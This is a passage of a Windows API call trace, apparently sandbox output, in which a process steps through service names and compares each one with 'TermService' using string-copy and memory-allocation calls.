lstrlenW (lpString="DiagTrack") returned 9 [0317.345] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.345] lstrlenW (lpString="DiagTrack") returned 9 [0317.345] lstrcpyW (in: lpString1=0x3790000, lpString2="DiagTrack" | out: lpString1="DiagTrack") returned="DiagTrack" [0317.345] lstrcmpW (lpString1="DiagTrack", lpString2="TermService") returned -1 [0317.345] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.346] lstrlenW (lpString="DmEnrollmentSvc") returned 15 [0317.346] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.347] lstrlenW (lpString="DmEnrollmentSvc") returned 15 [0317.347] lstrcpyW (in: lpString1=0x3790000, lpString2="DmEnrollmentSvc" | out: lpString1="DmEnrollmentSvc") returned="DmEnrollmentSvc" [0317.347] lstrcmpW (lpString1="DmEnrollmentSvc", lpString2="TermService") returned -1 [0317.347] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.348] lstrlenW (lpString="dmwappushservice") returned 16 [0317.348] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.348] lstrlenW (lpString="dmwappushservice") returned 16 [0317.348] lstrcpyW (in: lpString1=0x3790000, lpString2="dmwappushservice" | out: lpString1="dmwappushservice") returned="dmwappushservice" [0317.348] lstrcmpW (lpString1="dmwappushservice", lpString2="TermService") returned -1 [0317.348] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.349] lstrlenW (lpString="Dnscache") returned 8 [0317.349] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.539] lstrlenW (lpString="Dnscache") returned 8 [0317.539] lstrcpyW (in: lpString1=0x3790000, lpString2="Dnscache" | out: lpString1="Dnscache") returned="Dnscache" [0317.539] lstrcmpW (lpString1="Dnscache", lpString2="TermService") returned -1 [0317.539] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.541] lstrlenW (lpString="DoSvc") returned 5 [0317.541] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.541] lstrlenW (lpString="DoSvc") returned 5 [0317.541] lstrcpyW (in: lpString1=0x3790000, lpString2="DoSvc" | out: lpString1="DoSvc") returned="DoSvc" [0317.541] lstrcmpW (lpString1="DoSvc", lpString2="TermService") returned -1 [0317.541] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.542] lstrlenW (lpString="dot3svc") returned 7 [0317.542] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.543] lstrlenW (lpString="dot3svc") returned 7 [0317.543] lstrcpyW (in: lpString1=0x3790000, lpString2="dot3svc" | out: lpString1="dot3svc") returned="dot3svc" [0317.543] lstrcmpW (lpString1="dot3svc", lpString2="TermService") returned -1 [0317.543] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.544] lstrlenW (lpString="DPS") returned 3 [0317.544] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.544] lstrlenW (lpString="DPS") returned 3 [0317.544] lstrcpyW (in: lpString1=0x3790000, lpString2="DPS" | out: lpString1="DPS") returned="DPS" [0317.544] lstrcmpW (lpString1="DPS", lpString2="TermService") returned -1 [0317.544] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.545] lstrlenW (lpString="DsmSvc") returned 6 [0317.545] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.545] lstrlenW (lpString="DsmSvc") returned 6 [0317.546] lstrcpyW (in: lpString1=0x3790000, lpString2="DsmSvc" | out: lpString1="DsmSvc") returned="DsmSvc" [0317.546] lstrcmpW (lpString1="DsmSvc", lpString2="TermService") returned -1 [0317.546] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.546] lstrlenW (lpString="DsSvc") returned 5 [0317.546] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.547] lstrlenW (lpString="DsSvc") returned 5 [0317.547] lstrcpyW (in: lpString1=0x3790000, lpString2="DsSvc" | out: lpString1="DsSvc") returned="DsSvc" [0317.547] lstrcmpW (lpString1="DsSvc", lpString2="TermService") returned -1 [0317.547] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.548] lstrlenW (lpString="Eaphost") returned 7 [0317.548] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.548] lstrlenW (lpString="Eaphost") returned 7 [0317.548] lstrcpyW (in: lpString1=0x3790000, lpString2="Eaphost" | out: lpString1="Eaphost") returned="Eaphost" [0317.548] lstrcmpW (lpString1="Eaphost", lpString2="TermService") returned -1 [0317.548] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.549] lstrlenW (lpString="EFS") returned 3 [0317.549] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.549] lstrlenW (lpString="EFS") returned 3 [0317.549] lstrcpyW (in: lpString1=0x3790000, lpString2="EFS" | out: lpString1="EFS") returned="EFS" [0317.549] lstrcmpW (lpString1="EFS", lpString2="TermService") returned -1 [0317.550] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.550] lstrlenW (lpString="embeddedmode") returned 12 [0317.550] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.551] lstrlenW (lpString="embeddedmode") returned 12 [0317.551] lstrcpyW (in: lpString1=0x3790000, lpString2="embeddedmode" | out: lpString1="embeddedmode") returned="embeddedmode" [0317.551] lstrcmpW (lpString1="embeddedmode", lpString2="TermService") returned -1 [0317.551] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.552] lstrlenW (lpString="EntAppSvc") returned 9 [0317.552] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.552] lstrlenW (lpString="EntAppSvc") returned 9 [0317.552] lstrcpyW (in: lpString1=0x3790000, lpString2="EntAppSvc" | out: lpString1="EntAppSvc") returned="EntAppSvc" [0317.552] lstrcmpW (lpString1="EntAppSvc", lpString2="TermService") returned -1 [0317.555] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.556] lstrlenW (lpString="EventLog") returned 8 [0317.556] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.557] lstrlenW (lpString="EventLog") returned 8 [0317.557] lstrcpyW (in: lpString1=0x3790000, lpString2="EventLog" | out: lpString1="EventLog") returned="EventLog" [0317.557] lstrcmpW (lpString1="EventLog", lpString2="TermService") returned -1 [0317.557] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.557] lstrlenW (lpString="EventSystem") returned 11 [0317.557] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.558] lstrlenW (lpString="EventSystem") returned 11 [0317.558] lstrcpyW (in: lpString1=0x3790000, lpString2="EventSystem" | out: lpString1="EventSystem") returned="EventSystem" [0317.558] lstrcmpW (lpString1="EventSystem", lpString2="TermService") returned -1 [0317.558] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.559] lstrlenW (lpString="Fax") returned 3 [0317.559] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.559] lstrlenW (lpString="Fax") returned 3 [0317.559] lstrcpyW (in: lpString1=0x3790000, lpString2="Fax" | out: lpString1="Fax") returned="Fax" [0317.559] lstrcmpW (lpString1="Fax", lpString2="TermService") returned -1 [0317.559] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.560] lstrlenW (lpString="fdPHost") returned 7 [0317.560] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.561] lstrlenW (lpString="fdPHost") returned 7 [0317.561] lstrcpyW (in: lpString1=0x3790000, lpString2="fdPHost" | out: lpString1="fdPHost") returned="fdPHost" [0317.561] lstrcmpW (lpString1="fdPHost", lpString2="TermService") returned -1 [0317.561] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.561] lstrlenW (lpString="FDResPub") returned 8 [0317.561] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.562] lstrlenW (lpString="FDResPub") returned 8 [0317.562] lstrcpyW (in: lpString1=0x3790000, lpString2="FDResPub" | out: lpString1="FDResPub") returned="FDResPub" [0317.562] lstrcmpW (lpString1="FDResPub", lpString2="TermService") returned -1 [0317.562] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.563] lstrlenW (lpString="fhsvc") returned 5 [0317.563] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.563] lstrlenW (lpString="fhsvc") returned 5 [0317.563] lstrcpyW (in: lpString1=0x3790000, lpString2="fhsvc" | out: lpString1="fhsvc") returned="fhsvc" [0317.563] lstrcmpW (lpString1="fhsvc", lpString2="TermService") returned -1 [0317.563] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.564] lstrlenW (lpString="FontCache") returned 9 [0317.564] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.565] lstrlenW (lpString="FontCache") returned 9 [0317.565] lstrcpyW (in: lpString1=0x3790000, lpString2="FontCache" | out: lpString1="FontCache") returned="FontCache" [0317.565] lstrcmpW (lpString1="FontCache", lpString2="TermService") returned -1 [0317.565] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.565] lstrlenW (lpString="FontCache3.0.0.0") returned 16 [0317.566] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.566] lstrlenW (lpString="FontCache3.0.0.0") returned 16 [0317.566] lstrcpyW (in: lpString1=0x3790000, lpString2="FontCache3.0.0.0" | out: lpString1="FontCache3.0.0.0") returned="FontCache3.0.0.0" [0317.566] lstrcmpW (lpString1="FontCache3.0.0.0", lpString2="TermService") returned -1 [0317.566] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.567] lstrlenW (lpString="gpsvc") returned 5 [0317.567] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.567] lstrlenW (lpString="gpsvc") returned 5 [0317.567] lstrcpyW (in: lpString1=0x3790000, lpString2="gpsvc" | out: lpString1="gpsvc") returned="gpsvc" [0317.567] lstrcmpW (lpString1="gpsvc", lpString2="TermService") returned -1 [0317.567] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.568] lstrlenW (lpString="hidserv") returned 7 [0317.568] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.569] lstrlenW (lpString="hidserv") returned 7 [0317.569] lstrcpyW (in: lpString1=0x3790000, lpString2="hidserv" | out: lpString1="hidserv") returned="hidserv" [0317.569] lstrcmpW (lpString1="hidserv", lpString2="TermService") returned -1 [0317.569] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.570] lstrlenW (lpString="HomeGroupListener") returned 17 [0317.570] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.570] lstrlenW (lpString="HomeGroupListener") returned 17 [0317.573] lstrcpyW (in: lpString1=0x3790000, lpString2="HomeGroupListener" | out: lpString1="HomeGroupListener") returned="HomeGroupListener" [0317.573] lstrcmpW (lpString1="HomeGroupListener", lpString2="TermService") returned -1 [0317.573] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.574] lstrlenW (lpString="HomeGroupProvider") returned 17 [0317.574] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.574] lstrlenW (lpString="HomeGroupProvider") returned 17 [0317.574] lstrcpyW (in: lpString1=0x3790000, lpString2="HomeGroupProvider" | out: lpString1="HomeGroupProvider") returned="HomeGroupProvider" [0317.575] lstrcmpW (lpString1="HomeGroupProvider", lpString2="TermService") returned -1 [0317.575] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.576] lstrlenW (lpString="icssvc") returned 6 [0317.576] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.576] lstrlenW (lpString="icssvc") returned 6 [0317.576] lstrcpyW (in: lpString1=0x3790000, lpString2="icssvc" | out: lpString1="icssvc") returned="icssvc" [0317.576] lstrcmpW (lpString1="icssvc", lpString2="TermService") returned -1 [0317.576] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.577] lstrlenW (lpString="IEEtwCollectorService") returned 21 [0317.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.578] lstrlenW (lpString="IEEtwCollectorService") returned 21 [0317.578] lstrcpyW (in: lpString1=0x3790000, lpString2="IEEtwCollectorService" | out: lpString1="IEEtwCollectorService") returned="IEEtwCollectorService" [0317.578] lstrcmpW (lpString1="IEEtwCollectorService", lpString2="TermService") returned -1 [0317.578] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.579] lstrlenW (lpString="IKEEXT") returned 6 [0317.579] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.580] lstrlenW (lpString="IKEEXT") returned 6 [0317.580] lstrcpyW (in: lpString1=0x3790000, lpString2="IKEEXT" | out: lpString1="IKEEXT") returned="IKEEXT" [0317.580] lstrcmpW (lpString1="IKEEXT", lpString2="TermService") returned -1 [0317.580] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.581] lstrlenW (lpString="iphlpsvc") returned 8 [0317.581] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.581] lstrlenW (lpString="iphlpsvc") returned 8 [0317.581] lstrcpyW (in: lpString1=0x3790000, lpString2="iphlpsvc" | out: lpString1="iphlpsvc") returned="iphlpsvc" [0317.581] lstrcmpW (lpString1="iphlpsvc", lpString2="TermService") returned -1 [0317.581] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.582] lstrlenW (lpString="KeyIso") returned 6 [0317.582] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.583] lstrlenW (lpString="KeyIso") returned 6 [0317.583] lstrcpyW (in: lpString1=0x3790000, lpString2="KeyIso" | out: lpString1="KeyIso") returned="KeyIso" [0317.583] lstrcmpW (lpString1="KeyIso", lpString2="TermService") returned -1 [0317.583] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.674] lstrlenW (lpString="KtmRm") returned 5 [0317.674] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.699] lstrlenW (lpString="KtmRm") returned 5 [0317.699] lstrcpyW (in: lpString1=0x3790000, lpString2="KtmRm" | out: lpString1="KtmRm") returned="KtmRm" [0317.699] lstrcmpW (lpString1="KtmRm", lpString2="TermService") returned -1 [0317.699] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.701] lstrlenW (lpString="LanmanServer") returned 12 [0317.701] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.702] lstrlenW (lpString="LanmanServer") returned 12 [0317.702] lstrcpyW (in: lpString1=0x3790000, lpString2="LanmanServer" | out: lpString1="LanmanServer") returned="LanmanServer" [0317.702] lstrcmpW (lpString1="LanmanServer", lpString2="TermService") returned -1 [0317.703] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.707] lstrlenW (lpString="LanmanWorkstation") returned 17 [0317.707] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.712] lstrlenW (lpString="LanmanWorkstation") returned 17 [0317.712] lstrcpyW (in: lpString1=0x3790000, lpString2="LanmanWorkstation" | out: lpString1="LanmanWorkstation") returned="LanmanWorkstation" [0317.712] lstrcmpW (lpString1="LanmanWorkstation", lpString2="TermService") returned -1 [0317.712] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.718] lstrlenW (lpString="lfsvc") returned 5 [0317.718] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.718] lstrlenW (lpString="lfsvc") returned 5 [0317.718] lstrcpyW (in: lpString1=0x3790000, lpString2="lfsvc" | out: lpString1="lfsvc") returned="lfsvc" [0317.718] lstrcmpW (lpString1="lfsvc", lpString2="TermService") returned -1 [0317.718] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.719] lstrlenW (lpString="LicenseManager") returned 14 [0317.719] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.720] lstrlenW (lpString="LicenseManager") returned 14 [0317.720] lstrcpyW (in: lpString1=0x3790000, lpString2="LicenseManager" | out: lpString1="LicenseManager") returned="LicenseManager" [0317.720] lstrcmpW (lpString1="LicenseManager", lpString2="TermService") returned -1 [0317.720] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.720] lstrlenW (lpString="lltdsvc") returned 7 [0317.720] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.721] lstrlenW (lpString="lltdsvc") returned 7 [0317.721] lstrcpyW (in: lpString1=0x3790000, lpString2="lltdsvc" | out: lpString1="lltdsvc") returned="lltdsvc" [0317.721] lstrcmpW (lpString1="lltdsvc", lpString2="TermService") returned -1 [0317.721] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.721] lstrlenW (lpString="lmhosts") returned 7 [0317.721] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.721] lstrlenW (lpString="lmhosts") returned 7 [0317.721] lstrcpyW (in: lpString1=0x3790000, lpString2="lmhosts" | out: lpString1="lmhosts") returned="lmhosts" [0317.721] lstrcmpW (lpString1="lmhosts", lpString2="TermService") returned -1 [0317.722] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.722] lstrlenW (lpString="LSM") returned 3 [0317.722] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.722] lstrlenW (lpString="LSM") returned 3 [0317.722] lstrcpyW (in: lpString1=0x3790000, lpString2="LSM" | out: lpString1="LSM") returned="LSM" [0317.722] lstrcmpW (lpString1="LSM", lpString2="TermService") returned -1 [0317.722] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.723] lstrlenW (lpString="MapsBroker") returned 10 [0317.723] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.723] lstrlenW (lpString="MapsBroker") returned 10 [0317.723] lstrcpyW (in: lpString1=0x3790000, lpString2="MapsBroker" | out: lpString1="MapsBroker") returned="MapsBroker" [0317.723] lstrcmpW (lpString1="MapsBroker", lpString2="TermService") returned -1 [0317.723] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.724] lstrlenW (lpString="MpsSvc") returned 6 [0317.724] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.724] lstrlenW (lpString="MpsSvc") returned 6 [0317.725] lstrcpyW (in: lpString1=0x3790000, lpString2="MpsSvc" | out: lpString1="MpsSvc") returned="MpsSvc" [0317.725] lstrcmpW (lpString1="MpsSvc", lpString2="TermService") returned -1 [0317.725] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.725] lstrlenW (lpString="MSDTC") returned 5 [0317.725] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.726] lstrlenW (lpString="MSDTC") returned 5 [0317.726] lstrcpyW (in: lpString1=0x3790000, lpString2="MSDTC" | out: lpString1="MSDTC") returned="MSDTC" [0317.726] lstrcmpW (lpString1="MSDTC", lpString2="TermService") returned -1 [0317.726] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.726] lstrlenW (lpString="MSiSCSI") returned 7 [0317.726] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.727] lstrlenW (lpString="MSiSCSI") returned 7 [0317.727] lstrcpyW (in: lpString1=0x3790000, lpString2="MSiSCSI" | out: lpString1="MSiSCSI") returned="MSiSCSI" [0317.727] lstrcmpW (lpString1="MSiSCSI", lpString2="TermService") returned -1 [0317.727] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.728] lstrlenW (lpString="msiserver") returned 9 [0317.728] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.728] lstrlenW (lpString="msiserver") returned 9 [0317.728] lstrcpyW (in: lpString1=0x3790000, lpString2="msiserver" | out: lpString1="msiserver") returned="msiserver" [0317.728] lstrcmpW (lpString1="msiserver", lpString2="TermService") returned -1 [0317.728] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.729] lstrlenW (lpString="NcaSvc") returned 6 [0317.729] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.729] lstrlenW (lpString="NcaSvc") returned 6 [0317.729] lstrcpyW (in: lpString1=0x3790000, lpString2="NcaSvc" | out: lpString1="NcaSvc") returned="NcaSvc" [0317.729] lstrcmpW (lpString1="NcaSvc", lpString2="TermService") returned -1 [0317.729] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.730] lstrlenW (lpString="NcbService") returned 10 [0317.730] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.730] lstrlenW (lpString="NcbService") returned 10 [0317.730] lstrcpyW (in: lpString1=0x3790000, lpString2="NcbService" | out: lpString1="NcbService") returned="NcbService" [0317.730] lstrcmpW (lpString1="NcbService", lpString2="TermService") returned -1 [0317.730] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.730] lstrlenW (lpString="NcdAutoSetup") returned 12 [0317.730] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.731] lstrlenW (lpString="NcdAutoSetup") returned 12 [0317.731] lstrcpyW (in: lpString1=0x3790000, lpString2="NcdAutoSetup" | out: lpString1="NcdAutoSetup") returned="NcdAutoSetup" [0317.731] lstrcmpW (lpString1="NcdAutoSetup", lpString2="TermService") returned -1 [0317.731] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.731] lstrlenW (lpString="Netlogon") returned 8 [0317.731] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.732] lstrlenW (lpString="Netlogon") returned 8 [0317.732] lstrcpyW (in: lpString1=0x3790000, lpString2="Netlogon" | out: lpString1="Netlogon") returned="Netlogon" [0317.732] lstrcmpW (lpString1="Netlogon", lpString2="TermService") returned -1 [0317.732] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.732] lstrlenW (lpString="Netman") returned 6 [0317.732] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.733] lstrlenW (lpString="Netman") returned 6 [0317.733] lstrcpyW (in: lpString1=0x3790000, lpString2="Netman" | out: lpString1="Netman") returned="Netman" [0317.733] lstrcmpW (lpString1="Netman", lpString2="TermService") returned -1 [0317.733] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.733] lstrlenW (lpString="netprofm") returned 8 [0317.733] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.734] lstrlenW (lpString="netprofm") returned 8 [0317.734] lstrcpyW (in: lpString1=0x3790000, lpString2="netprofm" | out: lpString1="netprofm") returned="netprofm" [0317.734] lstrcmpW (lpString1="netprofm", lpString2="TermService") returned -1 [0317.734] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.734] lstrlenW (lpString="NetSetupSvc") returned 11 [0317.734] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.735] lstrlenW (lpString="NetSetupSvc") returned 11 [0317.735] lstrcpyW (in: lpString1=0x3790000, lpString2="NetSetupSvc" | out: lpString1="NetSetupSvc") returned="NetSetupSvc" [0317.735] lstrcmpW (lpString1="NetSetupSvc", lpString2="TermService") returned -1 [0317.735] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.735] lstrlenW (lpString="NetTcpPortSharing") returned 17 [0317.735] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.736] lstrlenW (lpString="NetTcpPortSharing") returned 17 [0317.736] lstrcpyW (in: lpString1=0x3790000, lpString2="NetTcpPortSharing" | out: lpString1="NetTcpPortSharing") returned="NetTcpPortSharing" [0317.736] lstrcmpW (lpString1="NetTcpPortSharing", lpString2="TermService") returned -1 [0317.736] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.736] lstrlenW (lpString="NgcCtnrSvc") returned 10 [0317.736] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.737] lstrlenW (lpString="NgcCtnrSvc") returned 10 [0317.737] lstrcpyW (in: lpString1=0x3790000, lpString2="NgcCtnrSvc" | out: lpString1="NgcCtnrSvc") returned="NgcCtnrSvc" [0317.737] lstrcmpW (lpString1="NgcCtnrSvc", lpString2="TermService") returned -1 [0317.737] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.737] lstrlenW (lpString="NgcSvc") returned 6 [0317.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.737] lstrlenW (lpString="NgcSvc") returned 6 [0317.737] lstrcpyW (in: lpString1=0x3790000, lpString2="NgcSvc" | out: lpString1="NgcSvc") returned="NgcSvc" [0317.738] lstrcmpW (lpString1="NgcSvc", lpString2="TermService") returned -1 [0317.738] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.738] lstrlenW (lpString="NlaSvc") returned 6 [0317.738] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0317.738] lstrlenW (lpString="NlaSvc") returned 6 [0317.738] lstrcpyW (in: lpString1=0x3790000, lpString2="NlaSvc" | out: lpString1="NlaSvc") returned="NlaSvc" [0317.738] lstrcmpW (lpString1="NlaSvc", lpString2="TermService") returned -1 [0317.738] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0317.739] lstrlenW (lpString="nsi") returned 3 [0317.739] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, 